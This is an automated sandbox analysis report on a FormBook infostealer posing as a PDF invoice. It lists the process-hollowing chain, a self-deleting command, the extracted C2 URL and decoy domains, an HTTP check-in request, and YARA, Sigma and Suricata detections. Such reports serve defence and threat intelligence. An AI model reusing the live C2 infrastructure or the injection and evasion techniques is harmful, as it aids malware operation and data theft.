Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Genesis RMS Private Limited November 2024 pdf.exe

Overview

General Information

Sample name:Genesis RMS Private Limited November 2024 pdf.exe
Analysis ID:1562986
MD5:a03815195e40a8caf9e0da80eccb9240
SHA1:f770dbb9f49ad2f03955a2c5a8c70373652d2ba9
SHA256:1477618f7a47c1e6cef99ff4626f541de642a01ec9219290d3a92546abc21c9e
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Genesis RMS Private Limited November 2024 pdf.exe (PID: 7684 cmdline: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe" MD5: A03815195E40A8CAF9E0DA80ECCB9240)
    • svchost.exe (PID: 7700 cmdline: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • rundll32.exe (PID: 7800 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • cmd.exe (PID: 7832 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.9-club.store/ma28/"], "decoy": ["orth.monster", "5970.pizza", "oinayangi.net", "usiness-funding-48965.bond", "uttere.buzz", "raumainformed.xyz", "amewith.today", "hetangosalon.net", "irewoodprice168.shop", "commerce-96305.bond", "3107.loan", "uohan.tech", "agakaw.website", "fricaduka.store", "ecga.info", "arehouse-inventory-27582.bond", "itchen-design-87997.bond", "eishahousesteaksushi.shop", "liopew.xyz", "4769.pizza", "111337tz1.shop", "6bwp.info", "edlinecolorado.net", "trewzxvbnm.online", "hemebox.info", "ajinismusdoktorankara.online", "iralcity.store", "aitbus.net", "w05.lat", "ruck-driver-jobs-16575.bond", "nline-advertising-48679.bond", "ryptocurrency-22237.bond", "epression-test-52238.bond", "otellatour.online", "leaningsuppliesorganizer.shop", "ardinenchante.online", "larheit.xyz", "elmondo.xyz", "xj121529q.vip", "nfluencer-marketing-83144.bond", "olconsulting.xyz", "nah.lat", "etking.photos", "dadlkj.online", "indows-66239.bond", "loverhoodie.shop", "rkaos.xyz", "afikotakediri.store", "iaokoa.net", "aahoma-alex1.rest", "revenzionefiscale.info", "itchen-design-56744.bond", "ueijodeminasoriginal.shop", "reast-cancer-symtoms-loft.world", "iddyspiderish.life", "execution.pro", "vjoami3.xyz", "4fe5i.xyz", "om-exchange-nft55729.sbs", "hgevb.info", "isc8ito.xyz", "ursuitbegins.forum", "louddistribution.net", "odgerlazerhats.net"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          1.2.svchost.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.svchost.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Rundll32 Execution Without CommandLine Parameters
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 7800, ProcessName: rundll32.exe
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", CommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", CommandLine|base64offset|contains: D, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", ParentImage: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe, ParentProcessId: 7684, ParentProcessName: Genesis RMS Private Limited November 2024 pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", ProcessId: 7700, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", CommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", CommandLine|base64offset|contains: D, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", ParentImage: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe, ParentProcessId: 7684, ParentProcessName: Genesis RMS Private Limited November 2024 pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe", ProcessId: 7700, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-26T11:17:18.647765+010020314531Malware Command and Control Activity Detected192.168.2.449909156.67.73.25480TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.9-club.store/ma28/"], "decoy": ["orth.monster", "5970.pizza", "oinayangi.net", "usiness-funding-48965.bond", "uttere.buzz", "raumainformed.xyz", "amewith.today", "hetangosalon.net", "irewoodprice168.shop", "commerce-96305.bond", "3107.loan", "uohan.tech", "agakaw.website", "fricaduka.store", "ecga.info", "arehouse-inventory-27582.bond", "itchen-design-87997.bond", "eishahousesteaksushi.shop", "liopew.xyz", "4769.pizza", "111337tz1.shop", "6bwp.info", "edlinecolorado.net", "trewzxvbnm.online", "hemebox.info", "ajinismusdoktorankara.online", "iralcity.store", "aitbus.net", "w05.lat", "ruck-driver-jobs-16575.bond", "nline-advertising-48679.bond", "ryptocurrency-22237.bond", "epression-test-52238.bond", "otellatour.online", "leaningsuppliesorganizer.shop", "ardinenchante.online", "larheit.xyz", "elmondo.xyz", "xj121529q.vip", "nfluencer-marketing-83144.bond", "olconsulting.xyz", "nah.lat", "etking.photos", "dadlkj.online", "indows-66239.bond", "loverhoodie.shop", "rkaos.xyz", "afikotakediri.store", "iaokoa.net", "aahoma-alex1.rest", "revenzionefiscale.info", "itchen-design-56744.bond", "ueijodeminasoriginal.shop", "reast-cancer-symtoms-loft.world", "iddyspiderish.life", "execution.pro", "vjoami3.xyz", "4fe5i.xyz", "om-exchange-nft55729.sbs", "hgevb.info", "isc8ito.xyz", "ursuitbegins.forum", "louddistribution.net", "odgerlazerhats.net"]}
          Multi AV Scanner detection for submitted file
          Source: Genesis RMS Private Limited November 2024 pdf.exeReversingLabs: Detection: 26%
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: Genesis RMS Private Limited November 2024 pdf.exeJoe Sandbox ML: detected
          Source: Genesis RMS Private Limited November 2024 pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1669851309.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670101325.0000000004210000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1672216614.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673809619.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.000000000349E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1739113966.0000000004B95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1734729766.00000000049E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1669851309.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670101325.0000000004210000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1734632822.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1672216614.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673809619.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734632822.000000000349E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000003.00000003.1739113966.0000000004B95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1734729766.00000000049E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130005798.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: svchost.exe, 00000001.00000003.1733882556.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733820601.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734555328.0000000002FE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4129174165.0000000000C20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000001.00000003.1733882556.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733820601.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1734555328.0000000002FE0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129174165.0000000000C20000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4141763780.00000000110CF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130564299.000000000528F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129438375.0000000003142000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4141763780.00000000110CF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4130564299.000000000528F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000003.00000002.4129438375.0000000003142000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_007B4696
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BC93C FindFirstFileW,FindClose,0_2_007BC93C
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007BC9C7
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF200
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF35D
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BF65E
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3A2B
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3D4E
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BBF27
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi1_2_0040E3B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi1_2_00417D7B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi3_2_02C4E3B6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi3_2_02C57D7B

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49909 -> 156.67.73.254:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49909 -> 156.67.73.254:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49909 -> 156.67.73.254:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.9-club.store/ma28/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.vjoami3.xyz
          Source: DNS query: www.olconsulting.xyz
          Tries to resolve many domain names, but no domain seems valid
          Source: unknownDNS traffic detected: query: www.ryptocurrency-22237.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.olconsulting.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.fricaduka.store replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.iaokoa.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.odgerlazerhats.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.iddyspiderish.life replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.itchen-design-87997.bond replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.vjoami3.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.hetangosalon.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.iralcity.store replaycode: Name error (3)
          Source: global trafficHTTP traffic detected: GET /ma28/?ghl=g3TxkNl+yn5Twcj+LCxINTWO7KBD43aaoKhKXIKU+srW3oC+3I0AD9gGWk+MTAYfd+/z&DvcT5=gd64Xt4xCL HTTP/1.1Host: www.loverhoodie.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: TESONETLT TESONETLT
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: 0_2_007C25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007C25E2
          Source: global trafficHTTP traffic detected: GET /ma28/?ghl=g3TxkNl+yn5Twcj+LCxINTWO7KBD43aaoKhKXIKU+srW3oC+3I0AD9gGWk+MTAYfd+/z&DvcT5=gd64Xt4xCL HTTP/1.1Host: www.loverhoodie.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.iddyspiderish.life
          Source: global trafficDNS traffic detected: DNS query: www.fricaduka.store
          Source: global trafficDNS traffic detected: DNS query: www.iralcity.store
          Source: global trafficDNS traffic detected: DNS query: www.itchen-design-87997.bond
          Source: global trafficDNS traffic detected: DNS query: www.hetangosalon.net
          Source: global trafficDNS traffic detected: DNS query: www.loverhoodie.shop
          Source: global trafficDNS traffic detected: DNS query: www.vjoami3.xyz
          Source: global trafficDNS traffic detected: DNS query: www.ryptocurrency-22237.bond
          Source: global trafficDNS traffic detected: DNS query: www.iaokoa.net
          Source: global trafficDNS traffic detected: DNS query: www.odgerlazerhats.net
          Source: global trafficDNS traffic detected: DNS query: www.olconsulting.xyz
          Source: explorer.exe, 00000002.00000003.3106127802.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135356271.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000002.00000003.3106127802.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135356271.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000002.00000003.3106127802.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135356271.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000002.00000003.3106127802.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691972906.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135356271.0000000009833000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
